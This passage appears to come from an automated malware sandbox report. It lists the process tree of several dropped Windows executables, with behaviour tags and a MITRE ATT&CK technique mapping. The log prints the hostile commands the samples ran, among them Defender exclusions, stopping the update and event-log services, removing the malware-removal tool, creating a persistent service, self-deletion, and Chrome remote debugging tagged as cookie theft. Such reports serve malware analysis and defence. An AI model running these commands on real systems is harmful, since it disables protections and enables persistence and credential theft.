        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6ed9758,0x7fef6ed9768,0x7fef6ed9778
        6⤵
        
        PID:2236
      - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        6⤵
        
        PID:1612
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1128 --field-trial-handle=1260,i,14339681879724050541,9396144054475061158,131072 /prefetch:2
        6⤵
        
        PID:2256
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1476 --field-trial-handle=1260,i,14339681879724050541,9396144054475061158,131072 /prefetch:8
        6⤵
        
        PID:2336
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1556 --field-trial-handle=1260,i,14339681879724050541,9396144054475061158,131072 /prefetch:8
        6⤵
        
        PID:2840
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2248 --field-trial-handle=1260,i,14339681879724050541,9396144054475061158,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1632
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2256 --field-trial-handle=1260,i,14339681879724050541,9396144054475061158,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1920
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2848 --field-trial-handle=1260,i,14339681879724050541,9396144054475061158,131072 /prefetch:2
        6⤵
        
        PID:1208
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2904 --field-trial-handle=1260,i,14339681879724050541,9396144054475061158,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1968
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3552 --field-trial-handle=1260,i,14339681879724050541,9396144054475061158,131072 /prefetch:8
        6⤵
        
        PID:1688
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3668 --field-trial-handle=1260,i,14339681879724050541,9396144054475061158,131072 /prefetch:8
        6⤵
        
        PID:2720
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\dt2no" & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:932
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3040
  - - C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe
      "C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Writes to the Master Boot Record (MBR)
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\1072446001\loqVSeJ.exe
      "C:\Users\Admin\AppData\Local\Temp\1072446001\loqVSeJ.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\1072605001\kUHbhqh.exe
      "C:\Users\Admin\AppData\Local\Temp\1072605001\kUHbhqh.exe"
      4⤵
      Executes dropped EXE
      PID:1252
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1072643041\GeneratedInstaller.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3472
  - - C:\Users\Admin\AppData\Local\Temp\1072644001\5bzo1pz.exe
      "C:\Users\Admin\AppData\Local\Temp\1072644001\5bzo1pz.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3680
    - - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\setup.msi"
        5⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3736
  - - C:\Users\Admin\AppData\Local\Temp\1072682001\cABT5qY.exe
      "C:\Users\Admin\AppData\Local\Temp\1072682001\cABT5qY.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:2456
    - - C:\Users\Admin\AppData\Local\Temp\1072682001\cABT5qY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1072682001\cABT5qY.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2136
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 516
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:336
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1924
  - - C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe
      "C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:2908
    - - C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe"
        5⤵
        Executes dropped EXE
        
        PID:2872
    - - C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2036
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 528
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2364
  - - C:\Users\Admin\AppData\Local\Temp\1073867001\UN8QxIq.exe
      "C:\Users\Admin\AppData\Local\Temp\1073867001\UN8QxIq.exe"
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:3240
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:2300
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1920
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        Drops file in Windows directory
        
        PID:3512
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:2256
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:3520
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2252
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:3800
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:1220
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        
        PID:4088
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        
        PID:880
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Power Settings
        
        PID:892
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:4092
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        
        PID:2884
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "YUPXPWRM"
        5⤵
        Launches sc.exe
        
        PID:3140
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "YUPXPWRM" binpath= "C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:4488
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:3568
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "YUPXPWRM"
        5⤵
        Launches sc.exe
        
        PID:4020
  - - C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
      "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3544
  - - C:\Users\Admin\AppData\Local\Temp\1073975001\WveK4j1.exe
      "C:\Users\Admin\AppData\Local\Temp\1073975001\WveK4j1.exe"
      4⤵
      Executes dropped EXE
      PID:2076
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:3944
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:4056
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:1636
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:1656
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:2548
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:988
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:764
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:1784
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:1424
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:2056
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:2380
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:3504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:2112
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\IBIQY'"
        5⤵
        
        PID:1680
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\IBIQY'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4300
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
        5⤵
        
        PID:4848
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4896
  - - C:\Users\Admin\AppData\Local\Temp\1074011001\Ryu8yUx.exe
      "C:\Users\Admin\AppData\Local\Temp\1074011001\Ryu8yUx.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:1192
    - - C:\Users\Admin\AppData\Local\Temp\1074011001\Ryu8yUx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1074011001\Ryu8yUx.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2760
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 520
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:3048
  - - C:\Users\Admin\AppData\Local\Temp\1074016001\UN8QxIq.exe
      "C:\Users\Admin\AppData\Local\Temp\1074016001\UN8QxIq.exe"
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      PID:1924
  - - C:\Users\Admin\AppData\Local\Temp\1074017001\kUHbhqh.exe
      "C:\Users\Admin\AppData\Local\Temp\1074017001\kUHbhqh.exe"
      4⤵
      Executes dropped EXE
      PID:2180
  - - C:\Users\Admin\AppData\Local\Temp\1074018001\Bjkm5hE.exe
      "C:\Users\Admin\AppData\Local\Temp\1074018001\Bjkm5hE.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:3472
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:3540
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa0,0xd8,0x7fef2029758,0x7fef2029768,0x7fef2029778
        6⤵
        
        PID:3876
  - - C:\Users\Admin\AppData\Local\Temp\1074019001\Fe36XBk.exe
      "C:\Users\Admin\AppData\Local\Temp\1074019001\Fe36XBk.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Executes dropped EXE
      Identifies Wine through registry keys
      PID:4008
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 384
        5⤵
        Program crash
        
        PID:4516
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1074020041\tYliuwV.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4764
  - - C:\Users\Admin\AppData\Local\Temp\1074022001\5bzo1pz.exe
      "C:\Users\Admin\AppData\Local\Temp\1074022001\5bzo1pz.exe"
      4⤵
      PID:4204
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 604
        5⤵
        Program crash
        
        PID:4344
  - - C:\Users\Admin\AppData\Local\Temp\1074023001\loqVSeJ.exe
      "C:\Users\Admin\AppData\Local\Temp\1074023001\loqVSeJ.exe"
      4⤵
      PID:4840
  - - C:\Users\Admin\AppData\Local\Temp\1074024001\7fOMOTQ.exe
      "C:\Users\Admin\AppData\Local\Temp\1074024001\7fOMOTQ.exe"
      4⤵
      PID:4900
  - - C:\Users\Admin\AppData\Local\Temp\1074026001\cABT5qY.exe
      "C:\Users\Admin\AppData\Local\Temp\1074026001\cABT5qY.exe"
      4⤵
      PID:3312
    - - C:\Users\Admin\AppData\Local\Temp\1074026001\cABT5qY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1074026001\cABT5qY.exe"
        5⤵
        
        PID:4752
    - - C:\Users\Admin\AppData\Local\Temp\1074026001\cABT5qY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1074026001\cABT5qY.exe"
        5⤵
        
        PID:4512
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 524
        5⤵
        Program crash
        
        PID:4532
  - - C:\Users\Admin\AppData\Local\Temp\1074027001\ViGgA8C.exe
      "C:\Users\Admin\AppData\Local\Temp\1074027001\ViGgA8C.exe"
      4⤵
      PID:932
  - - C:\Users\Admin\AppData\Local\Temp\1074029001\WveK4j1.exe
      "C:\Users\Admin\AppData\Local\Temp\1074029001\WveK4j1.exe"
      4⤵
      PID:3720

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "791162586-17390757251089965991891475246-2213953152091936882-1029179928-511727025"
1⤵
PID:1896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "72070733174121102980490687-630394945686549686-782771260-796351502-550151845"
1⤵
PID:3576

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-215543121-72060888714167893901751796608-1334606747-136594854318290207641214456692"
1⤵
PID:3912

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-139578265510642532488580954671027561089-386809146875224647-19488526181071085556"
1⤵
PID:2200

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "21140250756937990303648446181655913436-2034106640-1942861899-1643770134-1060198496"
1⤵
PID:1464

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1713208415-581354170-1199059374674338824-18426266361482668664-1032449251534804320"
1⤵
PID:3504

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2111005946-4753638861884974349-1405501826-19014394101755070153-13864641531768301321"
1⤵
PID:3604

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1534343383995709394-8619387921515097966251727796-127580162713097049141810434196"
1⤵
PID:1308

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-981461420-2138487257-2082848225-13764919192015737278-9673088901888924296675276644"
1⤵
PID:2296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

Power Settings

T1653

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Modify Authentication Process

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion